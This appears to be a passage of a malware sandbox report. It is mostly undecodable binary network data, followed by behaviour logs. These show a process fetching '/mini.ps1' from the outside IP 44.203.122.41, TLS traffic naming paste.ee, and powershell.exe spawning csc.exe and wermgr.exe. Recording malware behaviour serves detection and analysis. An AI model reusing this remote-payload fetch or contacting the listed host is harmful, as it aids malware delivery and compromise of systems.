,¼m£ÐA@ű¨ƒRÚÍh®ò9ÝôË\NJ\Èâþ-vÿ¥øµ´•>ec•ÅIåËóºŽ[ÁeiYþi‡…æ‡M*DWÈ:ª385G|ÅY²xÞx>Ú%¶9x+ïzäÇNU•$ÐÁ켇ޜGd´9ß?ªÀòf}TÎ%«Š®ûâ®>3aRndÄ vL¿YÉ%õKÄå W‚ᮧZß"ÞÓm¯QŠPdÒ:@SgΚHǖ…,®FÍHï4X äÿ4Î3E6ŸjrÓþ®‡AKD¿«n,ž…u³ªæƒµ±ÛóNå¡EÀH¶€ÜìîÄèdڍ÷ü¢l؆¿#ÌãC5˜×ÿ*-Æú˜]ž+M¼ E=~Äh\õMOó Ô\;æ€Ê%X¾‘ϦÁV’}ªùhUMŠ Å4âl`#0ØSîeæɋ½t{m9~š[å‰(ÕÜoé8*Õ ð ¿ç†³åŸçøòÐ4=Á+›eŠPv.%¬§w™IDâÍ7陨õ÷~Cz|-ã
Data received þ->÷ÇØ»t¢”ÌW$–çi5c\x6¦Táñ)çauQ0é,÷Š:µGüä‰fßhe=‚ ~ÌHÛË0ž-%:ÜÜߐǘ ‰1ëñ۟jbÛ zUß!Xˆ°Ê¿ n+­ {ššsÓ<À•èð”3–w1nsGÄè[D÷íBº£jcÒ¡ü]¨îLëyâ+}4„Lã_¦9¡¹9Cý†_֒y3e/vœ5 Éä¡|Aé”*äññ‡D˜!‡2øZ ˜•ðõ Øðë Ë[fµKÝN=sOŒ„TøQ!uà:u¨…u˜®‘ç—YÑ@UªZ–DüxuÇ|Twÿ™o' YtcÐk,NRçYÒ¦œ/ƒÕÇ:!Ûɑ ˜ºE /숯clâ³¢”SN$ÆÆjHk-xR_gD`%TƒHÑTÛéo+{>aùqow£$õfxqïç[·,ÞHÙ*O9tõêٙ’ƒhwõ¹¤Z þóáÔ¸ j½ÓsIÌߍ¬!³`Ê¥ÿ®gŠøÇpn„“×ëàQS9ñ³?wl+wx/Ûo^nºÄýÜV ž¸Z±$èZO8{k¸k&‡›|:\au'¾±‚öIøYíCe¿7TÏжKhA¨ÝÏZA«TëCZegQ|‹€eÐó(` Å1bE€ÝÀràѹMn\‚NÙòHitH™Çƒ0z÷,ͨ©*ìFG!¢Î›ø8kx&]„ %Å¥§,/A̳îÛÉë$ ›ùÅíYTæσ>Ú¢[ø'S–¨h·Éÿìîê”5VLøœP{¾Øsc>T©œxÁH8düµo’€ƒy¿e«Ë§øb8™G§Ò~ŸÓyC’Sn~YáV ‚bkZõÎΕת¸X'Ž±¿UH_½H #oɅø ¾­^DjzeT7>>ùùîLW×È ÛÑÏ:Á6<\ Äî³FCÃÊs–_q÷C@rg•-%{(pÜ à ü.øžö8ÌÁ¢l)¦ÝÔ¹ú·AhcK7 ö¡ p´ \;41E¶7Lpµ];–Œ0Ÿ0za—®"[Lm/Ëa( X'°ôs¢CŒù‡ Øå€<êNš²ƒ‚¼ý€ÛbT >~b-¿Wô ¿ ÃŠ»P_V€&«õe¯x*G–Û咭 |5¼2€[½%À{å Ì&÷µì‚š3mzÞóʇÀõ`¬^½eã3†°Lg…÷zbâŽÊDÛÑ}Ð0> ËS\-•¦JqVEíq;Î_n ë'¢x÷d˜'\3²C;a7½Ç’U—À¾qLVn$øl‡mqŠ æpÒ¿«ô‰—Þ§Z‚êScjÊÿg ²Ë8öð㧏¢|bÚä1mUgØ5^ÑTm²QWmìxMÿ‚ì+Qt&M9ø] åå>¯“ÑüÒÁÑ¡!jÀws÷c lnlZO¸®éúCÒ¹Y×_…¹3¡ÿ™HƒéyfŽ¢k΀Íó¡i÷9D¿!r¬Os**½æ>vº¸–8Ç&³÷kè’Q­+£4:žÛáq_gIï%OO¶GpT&öçÎÊ;$ °Ý<ÕñÅ3²‚u2G´µŒ°òm VŸc± [l‘Üe3 âŒ4áºþÝ(`ÍóÒR/ž×;þZk‡u™œÕhg™¿"³-ÆV°  Eúӕ±(ag ÏD8Š̈y&@êÑóDº Íâ¤ü½þjÂKÒE5ºÕyónÖÖôÝgq»ïÊÀ„•®­Ø͈³;ÐTqº“¶M± h)Ü99™
Data received ~1§.‰uïsL²‰tñš1(§µÚüiC\R몥Ç î×p<äñKSoõQÅáF»E“åÏքç‘öç~;N/™’‰K¬« › 'N,’t  ÷$h.[þû؁I¤jôÑæyElـ톦‘·ÓQiåfíÒ,Á#NöýrþD·!"a‹”+ŒpQZü²AÒ<jË­= Ui³]¸»Fó¢µ­~­‹x«ßÍݐ$Êèÿ?ÉöªûT"JÇÌ¿$[dñëؘeÿýŠ‰²(®˜ëpK U{ô^Ãi݊mƒ³v6[ €Mv  ›¬Y»³ð4u\”ˆ‡˜ +49 †ž‹ٜࡰ)s‚ër=~S5n•h¸Z2 Rû à!C§ـyªôocBªs … ^ö_'¹û `™/.0Ènߟç·º$GDtZïÊXq:þ>§#O#Ýð¯ÍFl ÒU7Gp w[¶Ú¾|¶â4ð½âë$'Û$ÌÉÜåo|‹ :kæÕ î?>UI¶KÍ Ñ„§]¡¤_ý= ëz[Ömw¥Øµ70úҝF Y~ÖàWÕ4a^»bšçs¾Þ¿ù¾«ó­Ñ¿$˜¹9Ÿ|M&Y¾Á-³Ž3ãè÷ØHh>h*á°~`Yâ[\îX„=$¼¶Gí«-rÉÊËk/¡ Ë¡-¯±Á <,¨º²ÐÏCÎUˆbÛ:Ç(%^H [¨¬ñɹ„ö_•6вáA×~Ðù^øzÓø¶Nsbƒ‚ÕÃLÙršMúæuæ4yœÅ•åùe„ùÛëC"äy*£7[œëó€üUñ+Âgl-SÓü¤]Š»…Öyë07{>ucgDÞØ ”Œ9Œâÿá°"d×ÐAÙ0¾ˆ–À²ú*U`Òñ'Ê`/ùQ5#çÎãF8ˆZD«(¨¦MrüOò9õ¼ÏvmãJû`ØZWÌù‡˜Ÿ0¾ï–\õî…kØo?]`Ý`qïÒgžßÑ[ÂãÝeó@L”9›r›;¯|ìbD—n \7Û ¦’r¥°<´˜ÙÙc…ÎHMƒûýWdY*g-àþÛ^Á~„àþá¼Çf?¥hÅ@£Æ띐²Õ¿,»30)ˆZ;ŧSNúñŽìô»Ipj¦|]ÀÉ÷²Œž§¥ðÝq«™´ÂOƒ£$8•AH’*™ßlÕW¹Å}X7ô…•Ž• ûç×,Ž;U8 00 ä¶i½*§™`€]À0¼¦LÎóüû؊¢`o^)6®C£Ïó,Ð˝•ÑaÅ —­}]̽kèTzõU§=zŠQ¾‡ð<®|ži¾ÁBƒAä`3¾Šˆlï`Öv,ű… )K´qîúôø…þîئÝvXk¶j?”CÈLîoØ_ÍØyÂþ øšËHÏ|ÎUÑO8¤«K!Z#\ýÉi¬ä…ÆXŠ°Ýê,¾¶ÉÎ2ZDãGñ'$¾ÞêEâ³0POðY’c„B¬§Hâ;Û&h¯¢ÁŒ@¢.Âlj¼^çµð˜Hz85¸ûÙ³Ùvhž s=|ãnm1ŸGôæŸJ~·ÐÐËW =‰´FZÜeÆ"©Þ¶bC`mìå>ÐîÃ~°l«rD!à^"ý/Qè _É ´¿pž•‡õøN¹ÇbØ~[܉öªdd:öÈÕË;{´“\×ÈOˆ(¯†uz µÜ‡Þ+=zjØ ‚5_ oNY-ñ%¡³«È™(èW8¹>áKŒ+ÙXÝ¡õ¡MJºU–Öëƒ^ò+=£žLµC僦÷ç 
Data received @
Data received ÷â¾{þ:%]ý'¼¾_”h‰«´o“7Ðþ1—Ç ]ù1ËEċ;ØNAºV#j•N_¶?;ñÀŽ Üþ·6ßë»´ÏùðEÛ-ë"jíokðۇ-E}ÓpP<’î÷ÚXj­¿»² a ®S~K5¬Ëè¬z—VZ2 íâR{qŽX¡ÊBw×-þ ˜ìŠTß^Y[c¶5FòzSOýöuÃ×vYé•IgG´he^k´èµîyÞ#¼GÝ{ÐÊ”öòÂXõ/ü6½å•Nµa=5!È°Yò+>âµC›ðdêlxüEtÍü> £TÈï«WôUˆàìöÓJè1®eo‚àP≾«0¬(Ě*ïv@Bu^0“ì¹ùÕÁWö­6¼‡ºoNg7&éâµÌ`Ù9.õÞ<,®ß™Ÿ§VÌí«Ð›ä¼;"J¡¼Šˆjtgoi”®¦M¤qý&Á…JœKÇ^åµ¢Jð±P›ÈaÕ§(®ð0̕ÊèS¯[?Jñ2R ùhüÐQ…RP†d?~QŸþÈ·ÿóËía[‰ß×úFsb÷!éyœh:iÉÃo‘Yo'Ók‹ð§l.Ý:R'Gc­À¤.=–$oÙ´A%¡&NCº¶ÆÞ¢ÔCy>ãcXþ3SÎÄǪÿ,OLü.ë<ýÝç‹"@].¼×òÉ8;0³¤lÈ"nxNwV9¢»é&`.U`PŒŠ0›mÎßI¦šuÇéf¿È¼Ú$Þb +ÓZQÔîE«z5š)O÷E#µ¯â'ð]ÂaÏ]õÿ—£™ß‘mE­€D¯á:N‘ð¹ÄO Ë(§Â'IýE©z€†i=rð‰%ÐlU "ø_Ûx꾁ÈiÁ<ªV¦˜ÜŸ¯‘ÄgŒüÆsøõy‹)к&ò2ºöv¯ýĞ[}à¨í2¤r\ø÷$4ÅÃð—õm ÞDC“’Ÿô¿prÅ.±aÖҠת™ö’ ¬=(¤£1ý@l<#ÕMQŸ}c*d®‰o4œÃ|©ïZÍ;H Þô[jJN}ç²Æô’”1Ÿgm˅tsÈlšÃr#‘yHÓ+µS˜aŸMFøuo4'ÈfJ5b%ª 8p~`cý¦9§;ŒÚoj̓yü'FSïïíN|ô¤0ÍR+íK²É£¬ŸmypŠë(k6Ž=FÉ$W=HÃSLVˆLEIÞ¿úî£áJ-ê ®;J¸°=áaå‰ð õ˗zðý"Wô]!à„ý3ÝߜçûhÑiʂÚÓolj줙É%¦Þ|„úD—Jò*ž%àÌ(§»N3Âó †Å5óÕm9žóÆO÷F#Ö¼ñåH*f¯]p¥ D:¯[vÁ¬pÏpüeÚInuÁ)qG£Èã“ú¶”lx¨rLýøV2”ÈL.ø&k´ÅU‡Ö¯
Data received 
Data received íR¦Îx©&‡ÙIÅSu Œ­øÞ{"y¸D!T®Ü
Data sent GET /mini.ps1 HTTP/1.1 Host: 44.203.122.41 Connection: Keep-Alive
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\9mrxduhn.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\afgz_pv1.cmdline"
host 44.203.122.41
Time & API Arguments Status Return Repeated

send

buffer: GET /mini.ps1 HTTP/1.1 Host: 44.203.122.41 Connection: Keep-Alive
socket: 1540
sent: 71
1 71 0

send

buffer: kge’ȍm«×–’­’GûRÉY«ouÂÅ´duÀÐ/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 1568
sent: 112
1 112 0

send

buffer: FBAXûv¨šì¶ISû)ÚyatÂچ >8ò(+þï¶CF“n¼ ¨NÏÛ\‹¨"M‡ŠÃ¤>Bï$¤®u0ÓñÈÆVî+0ZKô7Ȟã=V!â;O ühšuÞ¤J“ÈsÄýüÝ9„ƒ
socket: 1568
sent: 134
1 134 0

send

buffer: `rYZñ¼V›@ƒ[KŸ¢c;ãvRà7…èñµaw»u´A;''Y6¾X)K L#l+øsØÈÂƽd£¬ ?Îp±¡Þž þZ2*ÇÚë<†óúœžSu£ß7€†0
socket: 1568
sent: 101
1 101 0
parent_process powershell.exe martian_process "C:\Windows\system32\wermgr.exe" "-outproc" "2540" "928"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\9mrxduhn.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\afgz_pv1.cmdline"